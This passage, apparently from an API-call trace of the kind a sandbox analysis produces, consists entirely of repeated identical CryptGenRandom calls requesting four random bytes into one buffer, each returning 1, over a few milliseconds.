pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.374] CryptGenRandom (in: hProv=0x8bf310, 